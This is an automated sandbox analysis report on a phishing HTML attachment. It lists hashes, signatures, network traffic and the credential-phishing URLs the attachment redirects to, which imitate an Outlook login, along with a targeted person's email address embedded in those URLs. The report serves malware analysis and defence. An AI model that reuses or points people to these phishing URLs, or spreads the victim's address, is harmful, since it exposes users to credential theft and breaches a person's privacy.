Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
cfev.-Information refb08b4d10f3ce74a317adeabab8ac66ad.htm

Overview

General Information

Sample name:cfev.-Information refb08b4d10f3ce74a317adeabab8ac66ad.htm
Analysis ID:1527913
MD5:b9cf64fdae7c62e75f5f35355c0261b9
SHA1:faba41ba974d1fe8534c545935eb2eab611bee5c
SHA256:b045e7fb4e1dce89eb55b4134823ef99cd29ab3be496f9b52c708a71ee737cae

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

HTML file submission requesting Cloudflare captcha challenge
Phishing site detected (based on favicon image match)
Detected non-DNS traffic on DNS port
HTML body with high number of embedded images detected
HTML page contains hidden javascript code
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 4304 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\cfev.-Information refb08b4d10f3ce74a317adeabab8ac66ad.htm MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6844 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1976,i,6533601281323018158,15734234538063215681,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

Phishing

barindex
Source: https://uwz7bwosli.boyunglee.com/n6drat55y/iu89908445/?pln=Y2ZldkBubml0LmNvbQ==Matcher: Template: outlook matched with high similarity
Source: https://lgrlfh.biguncu.ru/onistf/#Ycfev@nnit.comMatcher: Template: outlook matched with high similarity
Source: cfev.-Information refb08b4d10f3ce74a317adeabab8ac66ad.htmHTTP Parser: Total embedded image size: 1298586
Source: https://lgrlfh.biguncu.ru/onistf/#Ycfev@nnit.comHTTP Parser: Base64 decoded: {"version":3,"sources":["/cfsetup_build/src/orchestrator/turnstile/templates/turnstile.scss","%3Cinput%20css%20qtFLbZ%3E"],"names":[],"mappings":"AAmCA,gBACI,GACI,uBClCN,CACF,CDqCA,kBACI,GACI,mBCnCN,CACF,CDsCA,iBACI,MAEI,cCrCN,CDwCE,IACI,mBCtCN,CACF,CDyCA...
Source: cfev.-Information refb08b4d10f3ce74a317adeabab8ac66ad.htmHTTP Parser: No favicon
Source: https://lgrlfh.biguncu.ru/onistf/#Ycfev@nnit.comHTTP Parser: No favicon
Source: https://lgrlfh.biguncu.ru/onistf/#Ycfev@nnit.comHTTP Parser: No favicon
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49720 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49721 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:49728 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:57200 version: TLS 1.2
Source: chrome.exeMemory has grown: Private usage: 1MB later: 32MB
Source: global trafficTCP traffic: 192.168.2.16:57190 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:57190 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:57190 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:57190 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:57190 -> 1.1.1.1:53
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: global trafficHTTP traffic detected: GET /F1WQ0N/86J8Dj386?&&IbN=Y2ZldkBubml0LmNvbQ%3D%3D HTTP/1.1Host: j8dj3.whtproff.bizConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: www.icas.com
Source: global trafficDNS traffic detected: DNS query: j8dj3.whtproff.biz
Source: global trafficDNS traffic detected: DNS query: uwz7bwosli.boyunglee.com
Source: global trafficDNS traffic detected: DNS query: res.public.onecdn.static.microsoft
Source: global trafficDNS traffic detected: DNS query: outlook.office.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: lgrlfh.biguncu.ru
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: pcuethwaen7onqjfhrwg4ngfi3oc5ywtq64idvouenaphxpdrju5li9bhcu.tropeyleg.ru
Source: global trafficDNS traffic detected: DNS query: noon.com
Source: global trafficDNS traffic detected: DNS query: www.noon.com
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 57193 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57195 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57200
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57194 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57191 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57200 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57195
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57196
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57191
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57193
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57194
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 57196 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49720 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49721 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:49728 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:57200 version: TLS 1.2
Source: classification engineClassification label: mal52.phis.evad.winHTM@26/17@46/138
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\cfev.-Information refb08b4d10f3ce74a317adeabab8ac66ad.htm
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1976,i,6533601281323018158,15734234538063215681,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1976,i,6533601281323018158,15734234538063215681,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: cfev.-Information refb08b4d10f3ce74a317adeabab8ac66ad.htmStatic file information: File size 1351741 > 1048576

Data Obfuscation

barindex
Source: https://lgrlfh.biguncu.ru/onistf/#Ycfev@nnit.comHTTP Parser: https://lgrlfh.biguncu.ru/onistf/#Ycfev@nnit.com
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Registry Run Keys / Startup Folder
1
Process Injection
1
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System2
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media2
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
Extra Window Memory Injection
1
Extra Window Memory Injection
Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive3
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
Ingress Tool Transfer
Traffic DuplicationData Destruction

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
a.nel.cloudflare.com
35.190.80.1
truefalse
    unknown
    icas.com
    213.32.226.197
    truefalse
      unknown
      lgrlfh.biguncu.ru
      104.21.26.253
      truetrue
        unknown
        uwz7bwosli.boyunglee.com
        172.67.221.126
        truefalse
          unknown
          HHN-efz.ms-acdc.office.com
          40.99.150.98
          truefalse
            unknown
            noon.com
            104.17.202.204
            truefalse
              unknown
              j8dj3.whtproff.biz
              188.114.97.3
              truefalse
                unknown
                ooc-g2.tm-4.office.com
                40.99.222.178
                truefalse
                  unknown
                  code.jquery.com
                  151.101.66.137
                  truefalse
                    unknown
                    cdnjs.cloudflare.com
                    104.17.24.14
                    truefalse
                      unknown
                      challenges.cloudflare.com
                      104.18.95.41
                      truefalse
                        unknown
                        www.google.com
                        142.250.185.100
                        truefalse
                          unknown
                          pcuethwaen7onqjfhrwg4ngfi3oc5ywtq64idvouenaphxpdrju5li9bhcu.tropeyleg.ru
                          188.114.96.3
                          truefalse
                            unknown
                            sni1gl.wpc.sigmacdn.net
                            152.199.21.175
                            truefalse
                              unknown
                              outlook.office.com
                              unknown
                              unknownfalse
                                unknown
                                www.icas.com
                                unknown
                                unknownfalse
                                  unknown
                                  res.public.onecdn.static.microsoft
                                  unknown
                                  unknownfalse
                                    unknown
                                    www.noon.com
                                    unknown
                                    unknownfalse
                                      unknown
                                      NameMaliciousAntivirus DetectionReputation
                                      http://j8dj3.whtproff.biz/F1WQ0N/86J8Dj386?&&IbN=Y2ZldkBubml0LmNvbQ%3D%3Dfalse
                                        unknown
                                        https://uwz7bwosli.boyunglee.com/n6drat55y/iu89908445/?pln=Y2ZldkBubml0LmNvbQ==true
                                          unknown
                                          https://lgrlfh.biguncu.ru/onistf/#Ycfev@nnit.comtrue
                                            unknown
                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs
                                            IPDomainCountryFlagASNASN NameMalicious
                                            142.250.185.99
                                            unknownUnited States
                                            15169GOOGLEUSfalse
                                            104.17.24.14
                                            cdnjs.cloudflare.comUnited States
                                            13335CLOUDFLARENETUSfalse
                                            142.250.185.206
                                            unknownUnited States
                                            15169GOOGLEUSfalse
                                            1.1.1.1
                                            unknownAustralia
                                            13335CLOUDFLARENETUSfalse
                                            34.104.35.123
                                            unknownUnited States
                                            15169GOOGLEUSfalse
                                            173.194.76.84
                                            unknownUnited States
                                            15169GOOGLEUSfalse
                                            104.18.94.41
                                            unknownUnited States
                                            13335CLOUDFLARENETUSfalse
                                            142.250.185.100
                                            www.google.comUnited States
                                            15169GOOGLEUSfalse
                                            40.99.222.178
                                            ooc-g2.tm-4.office.comUnited States
                                            8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                            104.18.95.41
                                            challenges.cloudflare.comUnited States
                                            13335CLOUDFLARENETUSfalse
                                            104.17.202.204
                                            noon.comUnited States
                                            13335CLOUDFLARENETUSfalse
                                            213.32.226.197
                                            icas.comUnited Kingdom
                                            62313PROACT-ASGBfalse
                                            172.67.221.126
                                            uwz7bwosli.boyunglee.comUnited States
                                            13335CLOUDFLARENETUSfalse
                                            239.255.255.250
                                            unknownReserved
                                            unknownunknownfalse
                                            188.114.97.3
                                            j8dj3.whtproff.bizEuropean Union
                                            13335CLOUDFLARENETUSfalse
                                            188.114.96.3
                                            pcuethwaen7onqjfhrwg4ngfi3oc5ywtq64idvouenaphxpdrju5li9bhcu.tropeyleg.ruEuropean Union
                                            13335CLOUDFLARENETUSfalse
                                            152.199.21.175
                                            sni1gl.wpc.sigmacdn.netUnited States
                                            15133EDGECASTUSfalse
                                            142.250.186.131
                                            unknownUnited States
                                            15169GOOGLEUSfalse
                                            151.101.66.137
                                            code.jquery.comUnited States
                                            54113FASTLYUSfalse
                                            35.190.80.1
                                            a.nel.cloudflare.comUnited States
                                            15169GOOGLEUSfalse
                                            40.99.150.98
                                            HHN-efz.ms-acdc.office.comUnited States
                                            8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                            104.21.26.253
                                            lgrlfh.biguncu.ruUnited States
                                            13335CLOUDFLARENETUStrue
                                            2.19.224.93
                                            unknownEuropean Union
                                            16625AKAMAI-ASUSfalse
                                            IP
                                            192.168.2.16
                                            Joe Sandbox version:41.0.0 Charoite
                                            Analysis ID:1527913
                                            Start date and time:2024-10-07 11:51:34 +02:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:11
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • EGA enabled
                                            Analysis Mode:stream
                                            Analysis stop reason:Timeout
                                            Sample name:cfev.-Information refb08b4d10f3ce74a317adeabab8ac66ad.htm
                                            Detection:MAL
                                            Classification:mal52.phis.evad.winHTM@26/17@46/138
                                            Cookbook Comments:
                                            • Found application associated with file extension: .htm
                                            • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
                                            • Excluded IPs from analysis (whitelisted): 142.250.186.131, 142.250.185.206, 173.194.76.84, 34.104.35.123, 199.232.210.172
                                            • Excluded domains from analysis (whitelisted): res-ocdi-public.trafficmanager.net, cdn-office.azureedge.net, clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, ctldl.windowsupdate.com, clientservices.googleapis.com, clients.l.google.com, cdn-office.ec.azureedge.net, res-1.public.onecdn.static.microsoft.edgekey.net
                                            • Not all processes where analyzed, report is missing behavior information
                                            • VT rate limit hit for: cfev.-Information refb08b4d10f3ce74a317adeabab8ac66ad.htm
                                            InputOutput
                                            URL: https://uwz7bwosli.boyunglee.com/n6drat55y/iu89908445/?pln=Y2ZldkBubml0LmNvbQ== Model: jbxai
                                            {
                                            "brand":[],
                                            "contains_trigger_text":false,
                                            "trigger_text":"",
                                            "prominent_button_name":"unknown",
                                            "text_input_field_labels":"unknown",
                                            "pdf_icon_visible":false,
                                            "has_visible_captcha":false,
                                            "has_urgent_text":false,
                                            "text":"Loading... Do not close or refresh the page!",
                                            "has_visible_qrcode":false}
                                            URL: https://lgrlfh.biguncu.ru/onistf/#Ycfev@nnit.com Model: jbxai
                                            {
                                            "brand":["Cloudflare"],
                                            "contains_trigger_text":false,
                                            "trigger_text":"",
                                            "prominent_button_name":"unknown",
                                            "text_input_field_labels":"unknown",
                                            "pdf_icon_visible":false,
                                            "has_visible_captcha":false,
                                            "has_urgent_text":false,
                                            "text":"Verifying... Verifying your browser to protect your online connection.",
                                            "has_visible_qrcode":false}
                                            URL: https://lgrlfh.biguncu.ru/onistf/#Ycfev@nnit.com Model: jbxai
                                            {
                                            "brand":["Cloudflare"],
                                            "contains_trigger_text":false,
                                            "trigger_text":"",
                                            "prominent_button_name":"unknown",
                                            "text_input_field_labels":"unknown",
                                            "pdf_icon_visible":false,
                                            "has_visible_captcha":false,
                                            "has_urgent_text":false,
                                            "text":"Verifying your browser to protect your online connection.",
                                            "has_visible_qrcode":false}
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Oct 7 08:52:07 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                            Category:dropped
                                            Size (bytes):2673
                                            Entropy (8bit):3.985743160760333
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:18DFD3F60A32D655C6B0EF89D8FC2E23
                                            SHA1:9C8CB6D497BC3D8C13F2FC75BF927AC17CF274BA
                                            SHA-256:7C365D2155C1F9AA678067A9A6FCA93195FC05E276B6AF35492A99B5EC752747
                                            SHA-512:F92A720C8956D05A52A3A3D99A2CD74285DB53C1B97F2146FFBB9902C74AA884254A01DEEB539DF9550BBDC9F361F7C2B434359406D8AD3999CC9F33B82F2A7F
                                            Malicious:false
